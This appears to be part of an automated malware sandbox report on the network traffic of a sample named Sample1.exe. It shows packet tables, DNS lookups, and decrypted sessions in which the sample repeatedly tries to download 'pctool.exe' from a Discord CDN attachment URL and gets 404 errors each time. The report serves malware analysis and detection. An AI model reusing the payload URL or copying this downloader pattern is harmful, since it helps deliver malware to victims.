Jan 15, 2025 15:15:36.610863924 CET	49790	443	192.168.2.25	162.159.129.233
Jan 15, 2025 15:15:36.611119032 CET	49790	443	192.168.2.25	162.159.129.233
Jan 15, 2025 15:15:36.611159086 CET	443	49790	162.159.129.233	192.168.2.25
Jan 15, 2025 15:15:37.064400911 CET	443	49790	162.159.129.233	192.168.2.25
Jan 15, 2025 15:15:37.065696001 CET	49790	443	192.168.2.25	162.159.129.233
Jan 15, 2025 15:15:37.065727949 CET	443	49790	162.159.129.233	192.168.2.25
Jan 15, 2025 15:15:37.215900898 CET	443	49790	162.159.129.233	192.168.2.25
Jan 15, 2025 15:15:37.215975046 CET	443	49790	162.159.129.233	192.168.2.25
Jan 15, 2025 15:15:37.216440916 CET	49790	443	192.168.2.25	162.159.129.233
Jan 15, 2025 15:15:37.216440916 CET	49790	443	192.168.2.25	162.159.129.233
Jan 15, 2025 15:15:42.219630957 CET	49791	443	192.168.2.25	162.159.129.233
Jan 15, 2025 15:15:42.219680071 CET	443	49791	162.159.129.233	192.168.2.25
Jan 15, 2025 15:15:42.219748020 CET	49791	443	192.168.2.25	162.159.129.233
Jan 15, 2025 15:15:42.219973087 CET	49791	443	192.168.2.25	162.159.129.233
Jan 15, 2025 15:15:42.219985962 CET	443	49791	162.159.129.233	192.168.2.25
Jan 15, 2025 15:15:42.675256968 CET	443	49791	162.159.129.233	192.168.2.25
Jan 15, 2025 15:15:42.676332951 CET	49791	443	192.168.2.25	162.159.129.233
Jan 15, 2025 15:15:42.676364899 CET	443	49791	162.159.129.233	192.168.2.25
Jan 15, 2025 15:15:42.800239086 CET	443	49791	162.159.129.233	192.168.2.25
Jan 15, 2025 15:15:42.800306082 CET	443	49791	162.159.129.233	192.168.2.25
Jan 15, 2025 15:15:42.801034927 CET	49791	443	192.168.2.25	162.159.129.233
Jan 15, 2025 15:15:42.801439047 CET	49791	443	192.168.2.25	162.159.129.233
Jan 15, 2025 15:15:47.813467026 CET	49792	443	192.168.2.25	162.159.129.233
Jan 15, 2025 15:15:47.813544989 CET	443	49792	162.159.129.233	192.168.2.25
Jan 15, 2025 15:15:47.813926935 CET	49792	443	192.168.2.25	162.159.129.233
Jan 15, 2025 15:15:47.813926935 CET	49792	443	192.168.2.25	162.159.129.233
Jan 15, 2025 15:15:47.813973904 CET	443	49792	162.159.129.233	192.168.2.25
Jan 15, 2025 15:15:48.277091980 CET	443	49792	162.159.129.233	192.168.2.25
Jan 15, 2025 15:15:48.279151917 CET	49792	443	192.168.2.25	162.159.129.233
Jan 15, 2025 15:15:48.279233932 CET	443	49792	162.159.129.233	192.168.2.25
Jan 15, 2025 15:15:48.409820080 CET	443	49792	162.159.129.233	192.168.2.25
Jan 15, 2025 15:15:48.409914017 CET	443	49792	162.159.129.233	192.168.2.25
Jan 15, 2025 15:15:48.410514116 CET	49792	443	192.168.2.25	162.159.129.233
Jan 15, 2025 15:15:48.411140919 CET	49792	443	192.168.2.25	162.159.129.233

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 15, 2025 15:11:25.584099054 CET	52517	53	192.168.2.25	1.1.1.1
Jan 15, 2025 15:11:25.590739965 CET	53	52517	1.1.1.1	192.168.2.25
Jan 15, 2025 15:13:29.981620073 CET	56204	53	192.168.2.25	1.1.1.1
Jan 15, 2025 15:13:29.988631010 CET	53	56204	1.1.1.1	192.168.2.25
Jan 15, 2025 15:13:52.515533924 CET	56204	53	192.168.2.25	1.1.1.1
Jan 15, 2025 15:13:52.522655010 CET	53	56204	1.1.1.1	192.168.2.25

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 15, 2025 15:11:25.584099054 CET	192.168.2.25	1.1.1.1	0xca0e	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:13:29.981620073 CET	192.168.2.25	1.1.1.1	0xb8ba	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:13:52.515533924 CET	192.168.2.25	1.1.1.1	0x4a34	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 15, 2025 15:11:25.590739965 CET	1.1.1.1	192.168.2.25	0xca0e	No error (0)	cdn.discordapp.com	162.159.130.233	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:11:25.590739965 CET	1.1.1.1	192.168.2.25	0xca0e	No error (0)	cdn.discordapp.com	162.159.133.233	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:11:25.590739965 CET	1.1.1.1	192.168.2.25	0xca0e	No error (0)	cdn.discordapp.com	162.159.129.233	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:11:25.590739965 CET	1.1.1.1	192.168.2.25	0xca0e	No error (0)	cdn.discordapp.com	162.159.135.233	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:11:25.590739965 CET	1.1.1.1	192.168.2.25	0xca0e	No error (0)	cdn.discordapp.com	162.159.134.233	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:13:29.988631010 CET	1.1.1.1	192.168.2.25	0xb8ba	No error (0)	cdn.discordapp.com	162.159.134.233	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:13:29.988631010 CET	1.1.1.1	192.168.2.25	0xb8ba	No error (0)	cdn.discordapp.com	162.159.130.233	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:13:29.988631010 CET	1.1.1.1	192.168.2.25	0xb8ba	No error (0)	cdn.discordapp.com	162.159.133.233	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:13:29.988631010 CET	1.1.1.1	192.168.2.25	0xb8ba	No error (0)	cdn.discordapp.com	162.159.135.233	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:13:29.988631010 CET	1.1.1.1	192.168.2.25	0xb8ba	No error (0)	cdn.discordapp.com	162.159.129.233	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:13:52.522655010 CET	1.1.1.1	192.168.2.25	0x4a34	No error (0)	cdn.discordapp.com	162.159.129.233	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:13:52.522655010 CET	1.1.1.1	192.168.2.25	0x4a34	No error (0)	cdn.discordapp.com	162.159.134.233	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:13:52.522655010 CET	1.1.1.1	192.168.2.25	0x4a34	No error (0)	cdn.discordapp.com	162.159.130.233	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:13:52.522655010 CET	1.1.1.1	192.168.2.25	0x4a34	No error (0)	cdn.discordapp.com	162.159.135.233	A (IP address)	IN (0x0001)	false
Jan 15, 2025 15:13:52.522655010 CET	1.1.1.1	192.168.2.25	0x4a34	No error (0)	cdn.discordapp.com	162.159.133.233	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

cdn.discordapp.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.25	49722	162.159.130.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:11:26 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:11:26 UTC	1045	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:11:26 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=RtehIt2Hn3wj4kC_VZ1Q4r5Ip.0VLw6PiBHZQ4M74.M-1736950286-1.0.1.1-397DXNb23R4O8RANXPaHFJUn7ecw1GNDplitM99jMAB9Rv_L0C_0i0SpLeGZNykGSvdZTqFadjmAz.ycouCRhA; path=/; expires=Wed, 15-Jan-25 14:41:26 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RBDyo3bgo1Apob3lSznADaL5nP3jaNnhYDV5LdKVagduzLugBtVmRxtc41NPvnSqiJyTDqSgUdone9pFcw4xVva3evO0qDlcSCLFMRa6y2a7EWbMGvRAkKdQJW%2FBM5w%2BwSGcPQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=_znWK6YLyRy.HpxcFyg9X3UEK_j_Vd36MEmQXjMMh5E-1736950286203-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 90267478af28429b-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:11:26 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.25	49723	162.159.130.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:11:31 UTC	104	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com
2025-01-15 14:11:32 UTC	1051	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:11:31 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=Y1PLbA0aNHfRX8timujJXq9HYeGcIUWXG_BG0G9Kcow-1736950291-1.0.1.1-EUGc7ohCaXCvKSKUK6xLWpmjLgAMbq9KodoyviCrPjHclQuIVXFPSAYPSV2TuxHLN1hN8yqxH.bt7eVm27nExw; path=/; expires=Wed, 15-Jan-25 14:41:31 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AV7ioMBTH1Vx93LSQvwb5HnlJ4clvy8i3oNom3UxrgeEn9S28BBn0GXji99tUifIgQMqWfN8ojSshNkaydm0ZSBIj4GPZ%2FmpwNZpz9KC1gFpp%2FGg7gfhwLO%2BmhXLO%2FIYbjP%2FjA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=gxrytAQHz6oEIXjQWKxJWQS60WwdUWpozY8atyttoPo-1736950291985-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 9026749cd8f84303-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:11:32 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.25	49724	162.159.130.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:11:37 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:11:37 UTC	1057	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:11:37 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=fcO6vXGc3Giom9Zc6i6ic3cmzA3FOOuaKqoDujmcLaM-1736950297-1.0.1.1-MMsEiig5bMfgcZdXgZ6EWtjHBwaOTCDL2.zUjWfBLc_u9PHsa8EYb6Uxqci1.i_tEA1J9AaZIyE5dUQHAsXj1w; path=/; expires=Wed, 15-Jan-25 14:41:37 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bSdH8Kwakh%2BIpWaOBPXdMvaPJ8iB7NuoQ86%2B2I4g8YIWR1pGZMlIdqhLyxl%2B42%2BrqkGmN%2BA0YaS%2FHHiVYd6I9GRdBCL9S8YafmvFZZA%2F8vLeZ55jwdNKljQf6%2F4Q0Ui7ZMypXg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=D_P_G3Y7ww.7dkxaSYyzLVgtmLtjOUnFUxDGGdsa9zY-1736950297594-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 902674bfdd2d5e64-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:11:37 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.25	49726	162.159.130.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:11:43 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:11:43 UTC	1047	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:11:43 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=AV5p34qo3Za2oFT6_EtQjEZ.Ge3P1FfiVDN7mmOsNTg-1736950303-1.0.1.1-tYmoWiL3JnVuw0TJrcZnTp6yJA7j9Imedd50oBloS1OPi_pj.kWmjI_OSKbeyxLF0QRcozsxEK8XV7fbIiU3Bg; path=/; expires=Wed, 15-Jan-25 14:41:43 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UmeUXp%2BhCXOLcjGY4vOg9xrFGci2a9pzQMfOTbflhNWXQyWD9q%2Fs6kVECcteQeNIeOiaDUW1VKFtxukobKBeLswjlRO47GTBCdAhMbUPq86X1byY5mb%2Fo57x4Dnu4yxsufGGgQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=s9qRKpvw5rlW2AY0XZd5XEjXP5xkjLsC_KETlWNT8R4-1736950303256-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 902674e33ae9c34b-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:11:43 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.25	49727	162.159.130.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:11:48 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:11:48 UTC	1047	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:11:48 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=.UwaOIfSvOqC0BNKgnRAIPbVVYXJG7GF55UcIimMWMU-1736950308-1.0.1.1-LcSC1fXDS2mvTASZJ4Fj9hlX7jdESlKSH27vBTdlANVVkRDDdRlgqRtSspshxwBwVA1bZ.Oqm1IS8a_3b2prlQ; path=/; expires=Wed, 15-Jan-25 14:41:48 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6ZpMf9xwafHcgHAulJzqJq4kcp4pKhgcwd60ZBhgpnl43SI8dg8jQuoUcAGWk9kWb9JDNL%2BSfBP8r%2FUi1RHKhu6awnroGzw62BlqTBPilsYBkHjYJRK51kGOZPkPBBqK%2B8Ze7g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=tcoNsqgqPhxeuQ_RLU2DDdumuyMHvW1i1yM8dHz84nY-1736950308877-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 90267506688d9e02-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:11:48 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.25	49729	162.159.130.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:11:54 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:11:54 UTC	1047	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:11:54 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=r5VfntsZIgao8TZ9Djx6xEAsEogsktL0RA0SLQB2_3o-1736950314-1.0.1.1-O1uUFzhHisTOsS0JrjBzbyRKHum9FuyOnHZfDSxz50N0uAmTLD505YLGP.BwoRYjagBHrE4Pu3rc9U4xh1kGow; path=/; expires=Wed, 15-Jan-25 14:41:54 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nL51iMvFoDwM4UukzKP2qsyiXCgfdmt43p%2B7PU0d6jOYWUlOMDLAhF%2BnhK1eCYGG68YHtTRDaF7cqm6hayokUbvpvSl9H1l5JxCZkpRU2tASxhsNjFLqEpsUJR%2FEesKw8kBrOg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=SqsrD_iDXt4EqEdj4CO1LbgGAQoD6JtkNPDYh16s.7I-1736950314541-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 902675296da20f83-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:11:54 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.25	49732	162.159.130.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:12:00 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:12:00 UTC	1051	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:12:00 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=1.70BF0SaeogAoPjj39ryc2vFOd5w4ImKwxhWsLDIEs-1736950320-1.0.1.1-AbNwzMlKdxRrxqSp78zkoX2ggQiWRzFBszReHRChGQZle5w4pftRgibEmROTEWD38_QhGNnKORf0oUlp1_rNRQ; path=/; expires=Wed, 15-Jan-25 14:42:00 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XTdCX845tzse1Pa5mANgrK%2BdCNlFzno%2FBWNSXip5fhBMU6vSUvYsJNNkUcKKD8TVgUOpOjKxX6ro%2BqzAU9FL%2FVP0Oze%2B8t10vLoUagS9LnlOSxosPWwBfjjk1tZObyCbD11BzA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=WFr1KfBjq9Knz3NC5yI71zRBSfZxl4HR0T1Uu54I3U0-1736950320239-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 9026754d59a20f55-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:12:00 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.25	49733	162.159.130.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:12:05 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:12:05 UTC	1047	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:12:05 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=tJ_Dt1s.FaR7sebsGQG9T1dga_5uSZGScuJSsoU54a0-1736950325-1.0.1.1-xoyqadx7y8aN4bysCh4QVuy_EkFzbJ2Jx2ZyVP0xHq70zZQUWb7l_EJroXPVx0LJjlpGZwUQQo445hz_crZqtQ; path=/; expires=Wed, 15-Jan-25 14:42:05 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PNbeupvhzUBpqMi9zYfYwlxkIgEsSaoRsJWjsqgt6hMBkmfGX97LpWE%2B19Nej9MFSxht%2FAShyH3BXP7INPJyxhdnOYenUr0hzMv401qdqVF14%2BJNW8bzfutMHbEF2DAkc3H37Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=gK7tyobMy9rF2ERoh0twUaZIiRTmlBwWtKc_6gPRCDs-1736950325890-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 90267570bf137c69-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:12:05 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.25	49734	162.159.130.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:12:11 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:12:11 UTC	1053	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:12:11 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=YaRDOW1tJWp7PdGKXemHPainavY_5e5ixsMKEqzCs_M-1736950331-1.0.1.1-5OeU7iaeMgtmGiNoUPsljsXTdlE6hZb0dKSNIyB16MSuNWdDpqIBST41KhEAac7h6GoHP4.N3B988mV8_QQxzg; path=/; expires=Wed, 15-Jan-25 14:42:11 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L3MSMPiZrGV%2FZqOIA4YyvwLvmg9fEhNMxsy%2BHM%2FhXXKTrWTMhU0ZnbwFIt%2FqKtXi1aUdeJz0v%2BmqdnbKRlGb%2BTyS8eiBqiw8hn7QBpAGtK5WcwnvIkplzyZviGAP8s7JtEI4cg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=f8cva1hjscT0u9wY_vPme7Pbx8L7lrw6YdnkojPWRbI-1736950331503-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 90267593cec10f3a-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:12:11 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.25	49735	162.159.130.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:12:17 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:12:17 UTC	1043	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:12:17 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=DqDPiRkqJd6rxXBTJqcS63.n4ufNRwOOR2_7Te.cC_Q-1736950337-1.0.1.1-VhAhCpzqesrqAu9kSzlqLjn0xiViRAfYKTnTMEC_y9q7mj1GBxhRHaE8WR50wFb9V30UOuTVwL68tDvgIBOr5g; path=/; expires=Wed, 15-Jan-25 14:42:17 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tbGQ7tcBy2yfEWTtiPL%2FfKB1PGjOuUeE1N4xEJXUERrnRqEraxfkop8S9PDTCjn1iElOZGCLkHDqo5eNkXlUz0GxRU3xJBbtZtq8E5P49lBy9yDg0jfm3AH8JRQH1FilpVUfXA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=4ulRCfuRjrEAHXUIh1sxktZ.IR.9pp8FY6SRWoy7FKU-1736950337158-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 902675b72c6f4380-EWR alt-svc: h3=":443"; ma=86400
2025-01-15 14:12:17 UTC	36	IN	Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e Data Ascii: This content is no longer available.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.25	49737	162.159.130.233	443	7448	C:\Users\user\Desktop\Sample1.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:12:22 UTC	128	OUT	GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2025-01-15 14:12:22 UTC	1049	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 14:12:22 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 36 Connection: close Set-Cookie: __cf_bm=ryHKRJ8BTqX3zz24OPtrH0Fja5ozBSLPCFqPx_uE42s-1736950342-1.0.1.1-Cqu.1J8NE7yyOlUw01Z3NxEIOo1qmwVMR51YEvK4vNJYeMayQo58R8.dNVtvD1jjX_mjPv1t_W5.KoG2k5l0CA; path=/; expires=Wed, 15-Jan-25 14:42:22 GMT; domain=.discordapp.com; HttpOnly; Secure Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6U9nPXnVsaxgTsniFdCeWUVNpJnGCCw8rd4w28vcqaO34gZzKhT7kl%2BZAIRBf%2BD4WhJaPIERH2xwPaTygbz94yxVGK3psdx4hN20UNXwFY%2Bw3IUMqZm2S8JUZ4ZyE048%2Brjanw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: _cfuvid=xENYmw6MdnpH3sGhf46vjltVtQCNXyPF5r6VOnWDIao-1736950342800-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 902675da6baf0f55-EWR alt-svc: h3=":443"; ma=86400
